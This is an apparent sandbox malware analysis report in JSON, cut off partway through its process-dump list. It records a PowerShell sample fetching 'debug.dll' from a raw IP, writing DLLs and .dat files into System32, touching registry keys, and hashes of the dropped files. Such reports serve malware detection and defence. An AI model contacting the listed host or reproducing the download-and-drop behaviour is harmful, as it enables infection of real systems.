{ "analysis_details": { "creation_time": "2017-10-11 13:00 (UTC+2)", "execution_successful": true, "number_of_processes": 21, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:16" }, "artifacts": { "files": [ { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "powershell.exe", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\desktop\\powershell.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONIN$", "hashes": [], "norm_filename": "conin$", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Tempdebug.dll", "hashes": [ { "md5_hash": "64b2ac701a0d67da134e13b2efc46900", "sha1_hash": "1bb516d70591a5a0eb55ee71f9f38597f3640b14", "sha256_hash": "f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\tempdebug.dll", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\rundll32.exe", "hashes": [], "norm_filename": "c:\\windows\\system32\\rundll32.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat", "hashes": [ { "md5_hash": "9cc8f01a19e5c00ef42c554b2aef38fd", "sha1_hash": "ac464faa791113edc96cc061835dcf5b698d5b01", "sha256_hash": "f7a647b095d8948d42f34958dc73fc9ca569399d81251336a59a1a3dcb6fe908", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\ikeext32.dll", "hashes": [ { "md5_hash": "f95622f161474511b8d80d6b093aa610", "sha1_hash": "691848e306566c63f5dfe1edcca7c7e8882c4caa", "sha256_hash": "f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\ikeext32.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\ikeext.dll", "hashes": [ { "md5_hash": "c3217cf9789f2b7a41f8ce54692d18fd", "sha1_hash": "f5bc9b2373201b214b3d0d248c95716023bc0c14", "sha256_hash": "f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\ikeext.dll", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\sensr9.dat", "hashes": [ { "md5_hash": "422a9797a40f1b1c3a72e9674adffedb", "sha1_hash": "92e351c5e1cc5abc36fb003b435acbc018253f56", "sha256_hash": "e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\sensr9.dat", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\sensr3.dat", "hashes": [ { "md5_hash": "6317421e5b20c3df65bf66b4ec472187", "sha1_hash": "c6ed48d2daf396178b1840a1877532c429d85cd0", "sha256_hash": "2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\sensr3.dat", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\kernel32.dll", "hashes": [], "norm_filename": "c:\\windows\\system32\\kernel32.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\desktop\\\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat\"", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "cmd.exe", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\desktop\\cmd.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "%0", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\desktop\\%0", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "213.183.51.187", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "delete", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CutBat", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "213.183.51.187/debug.dll", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/1bb516d70591a5a0eb55ee71f9f38597f3640b14", "file_type": "created_file", "id": "file_2", "md5_hash": "64b2ac701a0d67da134e13b2efc46900", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\tempdebug.dll", "sha1_hash": "1bb516d70591a5a0eb55ee71f9f38597f3640b14", "sha256_hash": "f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92", "size": 531456, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/92e351c5e1cc5abc36fb003b435acbc018253f56", "file_type": "created_file", "id": "file_3", "md5_hash": "422a9797a40f1b1c3a72e9674adffedb", "norm_filename": "c:\\windows\\system32\\sensr9.dat", "sha1_hash": "92e351c5e1cc5abc36fb003b435acbc018253f56", "sha256_hash": "e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac", "size": 4096, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c6ed48d2daf396178b1840a1877532c429d85cd0", "file_type": "created_file", "id": "file_4", "md5_hash": "6317421e5b20c3df65bf66b4ec472187", "norm_filename": "c:\\windows\\system32\\sensr3.dat", "sha1_hash": "c6ed48d2daf396178b1840a1877532c429d85cd0", "sha256_hash": "2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1", "size": 99767, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f5bc9b2373201b214b3d0d248c95716023bc0c14", "file_type": "created_file", "id": "file_5", "md5_hash": "c3217cf9789f2b7a41f8ce54692d18fd", "norm_filename": "c:\\windows\\system32\\ikeext.dll", "sha1_hash": "f5bc9b2373201b214b3d0d248c95716023bc0c14", "sha256_hash": "f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de", "size": 135680, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_6", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ac464faa791113edc96cc061835dcf5b698d5b01", "file_type": "created_file", "id": "file_7", "md5_hash": "9cc8f01a19e5c00ef42c554b2aef38fd", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat", "sha1_hash": "ac464faa791113edc96cc061835dcf5b698d5b01", "sha256_hash": "f7a647b095d8948d42f34958dc73fc9ca569399d81251336a59a1a3dcb6fe908", "size": 245, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/691848e306566c63f5dfe1edcca7c7e8882c4caa", "file_type": "created_file", "id": "file_8", "md5_hash": "f95622f161474511b8d80d6b093aa610", "norm_filename": "c:\\windows\\system32\\ikeext32.dll", "sha1_hash": "691848e306566c63f5dfe1edcca7c7e8882c4caa", "sha256_hash": "f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26", "size": 674304, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000002-region_00000405-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000002-region_00000405-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_26", "md5_hash": "df3058471357aa19b1c80305e5eac496", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "65d5b30e0192eed24481d228d0458a1ad6fab6f0", "sha256_hash": "aee4f39aa021f409aee109aea80195e35fa240a29185a4abd7baa8adc6813a38", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000408-addr_0x00000000001d0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000408-addr_0x00000000001d0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_27", "md5_hash": "4da0c9faf3b909b618e0e3cd6644ff3c", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9a3970da2ef098bb84c29c074e6f46805030793f", "sha256_hash": "fc56a08fb188212bd03df6e80086c6b9ac79b8db4204468ad6fe11fd4309c500", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000413-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000413-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_28", "md5_hash": "fba1bae534d2e5a6c86157302843a070", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "144409ec5f8a0e3b494fdcb87fa19b6d8faaeb22", "sha256_hash": "61d7a83a9e3587be40c0d5ef3f94b25d3fa7ee02b42ba7e2d564ad48b3f166ab", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000414-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000414-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_29", "md5_hash": "46f605fb042916ad5dfc755b726919f3", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2e2f642ce860424610addbf82d77c68bd88970a9", "sha256_hash": "8d92f90cc0d3c85a4a2590a15840d31cc641d2f45bea6f7a62be88249ebf0268", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000418-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000418-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_30", "md5_hash": "ae75df31f1ac1eb7c0bd7c1e807293de", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "136530d758f93d2b8d6b5e7daf2c5099eb0e88e5", "sha256_hash": "b11aa4a9239debfae5f3b0f0111704fd22cfbc9d327106c46eae1d5507d62368", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000429-addr_0x0000000000190000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000002-region_00000429-addr_0x0000000000190000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_31", "md5_hash": "43c5b0cf45fcfcb16224ea01b33ae82d", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0582e9bbe17d0a3ae4e6c77f90956797238ae960", "sha256_hash": "74a484d38e3de16ad9e7be272dc20ac0ef608596b618e00a8616b8758e04bf38", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000434-addr_0x00000000001c0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000434-addr_0x00000000001c0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_32", "md5_hash": "162be08fb256ce149251783b5d950182", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8d07f63681f79baed21869d16b3e702f0a8c3e0a", "sha256_hash": "7b7d8afc65f2028851f6747d7e77724ccedc18b203f5ddcc6ca3731fa3c18a00", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000436-addr_0x00000000003e0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000436-addr_0x00000000003e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_33", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000003-region_00000440-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000003-region_00000440-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_34", "md5_hash": "51bb8480611818c20bcfa6891e040cde", "ref_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4b6b4762e8961a0a6faeeb4c218f18116453f9af", "sha256_hash": "850fb1fd292777937bd0b74cd1652325432302d1b882f6ea93e2ca95bd8323d0", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000003-region_00000443-addr_0x0000000000190000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000003-region_00000443-addr_0x0000000000190000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_35", "md5_hash": "a1edf1358ff1f6a0ceea0a7556f6a7c7", "ref_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "08d58b48f90188937eb59b96625025d4fd8c912f", "sha256_hash": "acb83a8cab8751c94a567caae43ae6efe78b73b75c38efd2604570d127aee2a0", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000003-region_00000448-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000003-region_00000448-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_36", "md5_hash": "7b28991f373b8db10dc41f554d809c80", "ref_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7e9fa8da83a63c18eed43a31c7eac32cd8a63ff6", "sha256_hash": "50e8ddcd88daeb585229662218d171109bf6ea02f16bffeb7a22dce355d0ab3c", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000003-region_00000449-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000003-region_00000449-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_37", "md5_hash": "980bec786f7eef7be6c94faafb0e071d", "ref_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "83246fdfd61fb78a814f11b57f3524f425bba79f", "sha256_hash": "08d6efbc1be625f7e9880b92e00ef9f31870936d2736b1f9ac1b6cb53f2e763e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000003-region_00000453-addr_0x0000000000150000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000003-region_00000453-addr_0x0000000000150000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_38", "md5_hash": "a84e1f60e960090aea6f0dad03810039", "ref_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "876609a42ce0c867dddcb46df370758994ebdc14", "sha256_hash": "6f1a9c8cee05b2e689f34c0ee4ee161a4b2ce422efc847745f81eaa5331a2660", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000003-region_00000454-addr_0x0000000000250000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000003-region_00000454-addr_0x0000000000250000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_39", 